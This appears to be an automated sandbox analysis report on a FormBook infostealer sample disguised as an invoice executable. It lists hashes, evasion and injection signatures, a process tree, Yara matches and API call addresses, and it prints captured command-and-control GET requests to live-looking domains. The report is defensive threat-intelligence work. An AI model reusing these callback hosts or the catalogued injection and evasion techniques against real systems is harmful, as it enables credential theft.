
Analysis Report PT300975-inv.exe

Overview

General Information

Sample Name: PT300975-inv.exe
Analysis ID: 323028
MD5: 025544a9014cf1667e8a1d4ff68da253
SHA1: 0123853e7960cdae4f3ad95945b4ec86adbb93c6
SHA256: 2858bfcb9388b05049df45459ee60bf96be0b0d75a3be34cf3c00f57ec9f4469
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PT300975-inv.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\PT300975-inv.exe' MD5: 025544A9014CF1667E8A1D4FF68DA253)
    • mscorsvw.exe (PID: 5844 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe MD5: 38368FC9F84C7A27D0C8CD8E1543F172)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 1040 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6064 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author
2.2.mscorsvw.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.mscorsvw.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
2.2.mscorsvw.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
2.2.mscorsvw.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.mscorsvw.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: PT300975-inv.exe | ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.2.mscorsvw.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h]
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then mov ecx, dword ptr [0401E69Ch]
Source: C:\Users\user\Desktop\PT300975-inv.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi
Source: global traffic | HTTP traffic detected: GET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1 Host: www.solidconstruct.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1 Host: www.asacal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: unknown | DNS traffic detected: queries for: g.msn.com
Source: PT300975-inv.exe, 00000000.00000002.345062804.00000000013BB000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
.NET source code contains very large array initializations
Source: PT300975-inv.exe, nNu0028/Fx1.cs | Large array initialization: d!3: array initializer size 91136
Source: 0.2.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.cs | Large array initialization: d!3: array initializer size 91136
Source: 0.0.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.cs | Large array initialization: d!3: array initializer size 91136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00419D60 NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00419E10 NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00419E90 NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00419D5D NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00419E0B NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_00419E8A NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057295D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057297A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057296E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057299A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729560 NtWriteFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0572AD30 NtSetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729520 NtWaitForSingleObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057295F0 NtQueryInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729770 NtSetInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0572A770 NtOpenThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729760 NtOpenProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729730 NtQueryVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0572A710 NtOpenProcessToken,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729FE0 NtCreateMutant,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729670 NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729660 NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729650 NtQueryValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729610 NtEnumerateValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057296D0 NtCreateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729950 NtQueueApcThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057299D0 NtCreateProcessEx,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0572B040 NtSuspendThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729820 NtEnumerateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057298F0 NtReadVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_057298A0 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729B00 NtSetValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_0572A3B0 NtGetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729A10 NtQuerySection,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729A00 NtProtectVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Code function: 2_2_05729A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034AA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034AB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034AA770 NtOpenThread,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034AA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4_2_034A9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_034A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E90 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9D5D NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E8A NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_009A9E0B NtReadFile,
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_00C70392
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_00C6E5D9
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE4340
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE2520
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE3018
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE5E00
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE4330
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DEA0AF
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE24A9
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE3012
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DEF988
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DEF981
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE7EA0
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 0_2_02DE5DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041D8D2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041E197
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041D313
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00402D87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00409E40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041D63C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00409E3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041DF97
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0041DFAA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05706E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05704120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057120A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057ADBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B22AE
